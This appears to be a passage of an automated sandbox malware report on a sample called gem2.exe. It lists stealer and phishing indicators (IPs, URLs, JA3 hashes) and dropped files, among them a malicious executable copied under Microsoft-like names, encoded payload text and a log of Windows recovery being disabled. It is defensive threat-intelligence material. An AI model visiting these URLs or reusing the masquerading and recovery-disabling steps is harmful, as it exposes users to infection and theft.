                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              api.ipify.orggem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.67.74.152
                                                              https://support-confirm-help.click/Get hashmaliciousUnknownBrowse
                                                              • 172.67.74.152
                                                              zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 172.67.74.152
                                                              kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.13.205
                                                              dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.13.205
                                                              jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSgem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                              • 172.67.160.193
                                                              https://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                              • 104.21.90.106
                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                              • 162.159.134.233
                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 162.159.135.232
                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.219.181
                                                              http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                              • 104.21.56.69
                                                              http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                              • 104.21.22.141
                                                              http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                              • 104.21.1.232
                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              CLOUDFLARENETUSgem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                              • 172.67.160.193
                                                              https://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                              • 104.21.90.106
                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                              • 162.159.134.233
                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 162.159.135.232
                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.219.181
                                                              http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                              • 104.21.56.69
                                                              http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                              • 104.21.22.141
                                                              http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                              • 104.21.1.232
                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              CLOUDFLARENETUSgem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                              • 172.67.160.193
                                                              https://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                              • 104.21.90.106
                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                              • 162.159.134.233
                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 162.159.135.232
                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.219.181
                                                              http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                              • 104.21.56.69
                                                              http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                              • 104.21.22.141
                                                              http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                              • 104.21.1.232
                                                              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              bd0bf25947d4a37404f0424edf4db9ad58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              pyld611114.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.Win64.Evo-gen.9614.31304.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              app64.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              74954a0c86284d0d6e1c4efefe92b521gem1.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              tiko-ifyzit-srdh.vbsGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                              • 104.26.12.205
                                                              Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                                              • 104.26.12.205
                                                              PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                                              • 104.26.12.205
                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              37f463bf4616ecd445d4a1937da06e19gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.21.60.172
                                                              1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                              • 104.21.60.172
                                                              1387457-38765948.15.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.60.172
                                                              build.exeGet hashmaliciousVidarBrowse
                                                              • 104.21.60.172
                                                              zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.21.60.172
                                                              ix8kxoBHDb.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.21.60.172
                                                              b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.60.172
                                                              c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 104.21.60.172
                                                              ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 104.21.60.172
                                                              grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 104.21.60.172

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cGFzdGVzbmFwM[1].txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):7071064
                                                              Entropy (8bit):5.999924958826124
                                                              Encrypted:false
                                                              SSDEEP:49152:v/KrwoCmD+esMkK5xDyB6vZT9xitPA7McncoinywDBwLky1SQr/N6aAIp8Sp38mH:i
                                                              MD5:7425A9D8FC994FB813CFB3115BB78E14
                                                              SHA1:DA632D13A0BBB4577AB0278BC99AF81299A64568
                                                              SHA-256:A79B9BE919E6F28D438F238CCD973B13F26B9368E196A674A84E1D23E56D19E5
                                                              SHA-512:1E1C29AF1600F5CFE4F180151274B10C0AC373A57D9E11A56E174C66EBF6BF35E67FBFB77B0F00537B846C65E1CD05B56836F50471EDE8140CF3FF4F947258B5
                                                              Malicious:false
                                                              Preview:IS/+YW91bmFodW5hk4puYdR1bmFsdW5hLHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5h7HVuYWJq1G9swWesTc1vLaFUOgkFBk4RHhoJEw0YTgINGwAOGFUMBEwHGw9MHABBKDo9QQEaCgRCeGNrSHVuYWx1bmE8MG5hCPNnYWi17wZsdW5hbHVuYZx1TGFnd2BIbCtsYWyhbmFsdW5hLZIfYWxlbmFsdW4hbXVuYWxlbmFsd25hanVuYWx1bmFqdW5hbHVuYWzFr2FscW5hbHVuYW51DuBsdX5hbHVuYWxlbmFsdW5hbHV+YWx1bmFsZW5hbHVuYWx1bmF8dW5hbHVuYWx1bmGcFq5haHRuYWzlr2G5dG5hXDivYfw3bmFsdW5hbHVuYWzVr2E8dW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hxKwfYUR1bmGcPq9hLHRuYWx1bmFsdW5hbNUeYax2bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFCAQsZGHVuYeQpbGFsZW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFMdW4BQgcKABgUbmE0125hbAVsYWx1bmFsdW5hbHVuYWx1bmFsdW5hLHVuIUIRDxUNdW5hLGZuYWxVbWFsdW5hbHVuYWx1bmFsdW5hbHVuYSx1bqFCBQoAGBRuYchjbmFsNW1hbHVuYWx1bmFsdW5hbHVuYWx1bmEsdW4hQhU0CWx1bmGXSQNhbBVtYWx1bmFsdW5hbHVuYWx1bmFsdW5hTHVuAUIJARBsdW5hlHZuYWzVHmFscW5hbHFuYWx1bmFsdW5hbHVuYSx1bqFCXEgfbHVuYayqPmFsxR5hbJU+YWx9bmFsdW5hbHVuYWx1bmEMdW4JQgcdEw91bmG5dG5hbOWvYWx3bmFsnT5hbHVuYWx1bmFsdW5hLHVuIUIHCw0DFm5hPHVuYWzVr2Fsd25hbJ8+YWx1bmFsdW5hbHVuYSx1

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cGFzdGVzbmFwR[1].txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):222552
                                                              Entropy (8bit):5.990333251377902
                                                              Encrypted:false
                                                              SSDEEP:6144:qXsTRWRdYXqufqspfNgCJgtHjo2+mPrr2NhqE2:qXsdymq4ng9o2vPrr2nW
                                                              MD5:D15D21A47114E13D0ECD695F9CC7752B
                                                              SHA1:DAD45A62DE5AC90C668D47ECC9B3D633E8DB123D
                                                              SHA-256:61DA3F2353E4F178DF52F82FCE50BC9A42FFC3B874D5983C84F60987162B8AC3
                                                              SHA-512:8307990631AF0C14558C806172C79E1B0108AB99C65FC8F990D111A17B56F289855BD50AC54D0486650727E6B289B7561C7A8F612B75C359774E30D9C8DC59B3
                                                              Malicious:false
                                                              Preview:IS/+YW91bmFodW5hk4puYdR1bmFsdW5hLHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hhHVuYQQH1G9swWesTc1vLaFUOgkFBk4RHhoJEw0YTgINGwAOGFUMBEwHGw9MHABBKDo9QQEaCgRCeGNrSHVuYWx1bmHr+Lwyr5nSYa+Z0mGvmdJh5OHUYK6Z0mHk4dNgopnSYa+Z02HNmdJh5BzaYKmZ0mHkHC1hrpnSYa+ZRWGumdJh5BzQYK6Z0mE+HA0Jr5nSYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYTwwbmEgdGphDW4dBmx1bmFsdW5hjHVsYGd0YEhseW5hbAlsYWx1bmH0Ym5hbGVuYWxVbmFsdS5hbGVuYWx3bmFqdW5hbHVuYWp1bmFsdW5hbMVsYWxxbmFsdW5hbnUu5Gx1fmFsZW5hbHV+YWxlbmFsdW5hfHVuYWx1bmFsdW5hPExuYRR1bmFsNW5hVC9sYWx1bmFsdW5hbHVuYWx1bmFs1WxhjHVuYXBNbmFUdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWxVbmHkdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hQgELGRh1bmHPfm5hbGVuYWx5bmFscW5hbHVuYWx1bmFsdW5hTHVuAUIHCgAYFG5hLGluYWxVbmFsa25hbGVuYWx1bmFsdW5hbHVuYSx1biFCBx0TD3VuYVQvbGFsNW5hbClsYWxbbmFsdW5hbHVuYWx1bmEsdW4hQgcLDQMWbmGMdW5hbNVsYWx3bmFs/2xhbHVuYWx1bmFsdW5hLHVuI2x1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllultnxj:NllU
                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe

                                                              Download File
                                                              Process:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:modified
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eisvokjp.w0u.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hio2y314.4sq.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhttnkvt.2xv.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbqbtqgs.41v.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Logs\ReAgent\ReAgent.log

                                                              Download File
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1809
                                                              Entropy (8bit):4.309491540810431
                                                              Encrypted:false
                                                              SSDEEP:48:2BAB/BABJB2BbBSlB2TE5WHHBFKB4TBdABjMBABtB2:2BAB/BABJB2BbByB2QwHBcBeBdABoBAE
                                                              MD5:EF5FB45CE5DE2B2FF3E526B417F14463
                                                              SHA1:8E11D0C0E3A193122EA6B6E34B232E06D58CCEE1
                                                              SHA-256:0A23B1FBB9B67019606F3A254F0AD75426D24E9DD9DF3F6A31493B6212DEA913
                                                              SHA-512:2C6274E9D39EF6622AD889F9982E71772997E507126A6C967E8742FE678D6012D14CAE1AC4CAE7557DFBD2E52E4C4F2DD22FD923225708AA9D605E1AE95AAB13
                                                              Malicious:false
                                                              Preview:.2025-01-12 03:26:32, Info [ReAgentc.exe] ------------------------------------------------------..2025-01-12 03:26:32, Info [ReAgentc.exe] -----Executing command line: reagentc /disable-----..2025-01-12 03:26:32, Info [ReAgentc.exe] ------------------------------------------------------..2025-01-12 03:26:32, Info [ReAgentc.exe] Enter WinReUnInstall..2025-01-12 03:26:32, Info [ReAgentc.exe] Update enhanced config info is enabled...2025-01-12 03:26:32, Warning [ReAgentc.exe] Failed to get recovery entries: 0xc0000225..2025-01-12 03:26:32, Info [ReAgentc.exe] winreGetWinReGuid returning 0X490..2025-01-12 03:26:32, Info [ReAgentc.exe] ReAgentConfig::ReadBcdAndUpdateEnhancedConfigInfo WinRE disabled, WinRE Guid could not be determined (0x490) ..2025-01-12 03:26:32, Info [ReAgen

                                                              C:\Windows\Panther\UnattendGC\diagerr.xml

                                                              Download File
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (310)
                                                              Category:dropped
                                                              Size (bytes):50033
                                                              Entropy (8bit):4.883591528740043
                                                              Encrypted:false
                                                              SSDEEP:384:53Iq3Ie3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3II:5l7ljllllljjllllllllllljjl5T
                                                              MD5:A2113D90DE3D22986CA83D81ED189471
                                                              SHA1:EBA7076A8603F2D90D7584F0249BA42E5AF17B99
                                                              SHA-256:707E8D9A0AEE81DB57E605895BB2853ED56636CD1357887522D75CACCEB2569C
                                                              SHA-512:E254FD144FCBC1959E25793E93D9192BCFF77005529226906452E450BA640DA4DF823BC6E8D16F4954C9DA4A97550B0F9D737C44995F8374F8580546B5A62EBA
                                                              Malicious:false
                                                              Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                              C:\Windows\Panther\UnattendGC\diagwrn.xml

                                                              Download File
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                              Category:modified
                                                              Size (bytes):51331
                                                              Entropy (8bit):4.919891102441454
                                                              Encrypted:false
                                                              SSDEEP:384:53Iq3Ir3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3IE:5lQljllllljjllllllllllljjlhVT
                                                              MD5:378D2339CE730B59DAF3F4B534CF2D73
                                                              SHA1:8A24942949EE8EA9C9A16FD0C61BEE5F66B8EF3F
                                                              SHA-256:503A491FC0E6CF7A760434BAB7C1214A8A720446C867B86E4EE2AC25FB159F2C
                                                              SHA-512:129D431005FC12C07B9DE03DA9D383BB7E5C9A2D4FD937F8D4AC4C15F0C656F3FBDCEC02D856A533170998BA01E031ECBD0FDD497354FD9B8D4B758BD80DE86D
                                                              Malicious:false
                                                              Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                              C:\Windows\Panther\UnattendGC\setuperr.log

                                                              Download File
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):224
                                                              Entropy (8bit):4.6576199529314115
                                                              Encrypted:false
                                                              SSDEEP:3:92UQsKO8/FFORYxZaMJAvK/kFpdEJwHVDMUQVY3d/tXwD+/FFQBBcqxBLELY5t3i:Yus/4YxzJ/MPxVZCYt/tXp/4BNBAAy
                                                              MD5:6F6A8CEA820E8F0183AE75C157696C54
                                                              SHA1:03505147AA050C372B3ED030080F840CDF631755
                                                              SHA-256:47D913FD9D14718C135B91ECEFDC8AEC773D65BC53AC9834BA6BB0D0BEC9B55B
                                                              SHA-512:0694D2EF0D572833C348CD9F3A0285631F7B6C932A140A08329908BCC662A3345DE47A686AF8CDFFF6E44A89D6E5CB86FBA568E95078D62672E8AE68EDF2CDB9
                                                              Malicious:false
                                                              Preview:.2023-10-03 08:57:16, Error [msoobe.exe] COMMIT: failed for plugin LocalUser Plugin with hr=0x80070490..2025-01-12 03:26:32, Error [ReAgentc.exe] WinReUnInstall failed: : 0x2..

                                                              C:\Windows\SysWOW64\$LMX-f4855f59e0.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
